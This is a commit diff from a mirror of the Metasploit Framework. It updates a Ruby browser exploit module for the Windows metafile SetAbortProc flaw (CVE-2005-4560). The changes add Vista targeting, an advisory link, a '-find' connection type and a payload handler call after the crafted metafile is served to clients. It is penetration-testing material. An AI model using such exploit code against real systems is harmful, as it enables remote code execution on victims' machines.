infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated 

git-svn-id: file:///home/svn/incoming/trunk@3301 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2006-01-03 04:06:03 +00:00
parent d45bb85cf6
commit 9452249c09
1 changed files with 9 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
modules/exploits/windows/browser/metafile_abortproc.rb
View File

@ -11,7 +11,7 @@ class Exploits::Windows::Browser::MetafileAbortProc < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Windows XP/2003 Metafile Escape() SetAbortProc Code Execution', 'Name' => 'Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution',
'Description' => %q{ 'Description' => %q{
This module exploits a vulnerability in the GDI library included with This module exploits a vulnerability in the GDI library included with
Windows XP and 2003. This vulnerability uses the 'Escape' metafile function Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
@ -31,6 +31,7 @@ class Exploits::Windows::Browser::MetafileAbortProc < Msf::Exploit::Remote
['CVE', '2005-4560'], ['CVE', '2005-4560'],
['OSVDB', '21987'], ['OSVDB', '21987'],
['MIL', '111'], ['MIL', '111'],
['URL', 'http://www.microsoft.com/technet/security/advisory/912840.mspx'],
['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'], ['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'], ['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
], ],
@ -44,13 +45,13 @@ class Exploits::Windows::Browser::MetafileAbortProc < Msf::Exploit::Remote
'BadChars' => "\x00", 'BadChars' => "\x00",
'Compat' => 'Compat' =>
{ {
# 'ConnectionType' => "-find" 'ConnectionType' => '-find',
} },
}, },
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Windows XP/2003 Automatic', { }], [ 'Windows XP/2003/Vista Automatic', { }],
], ],
'DisclosureDate' => 'Dec 27 2005', 'DisclosureDate' => 'Dec 27 2005',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
@ -68,6 +69,8 @@ class Exploits::Windows::Browser::MetafileAbortProc < Msf::Exploit::Remote
# Transmit the compressed response to the client # Transmit the compressed response to the client
send_html_gzip_response(cli, generate_metafile(p), { 'Content-Type' => 'text/plain' }) send_html_gzip_response(cli, generate_metafile(p), { 'Content-Type' => 'text/plain' })
handler(cli)
end end
def generate_metafile(payload) def generate_metafile(payload)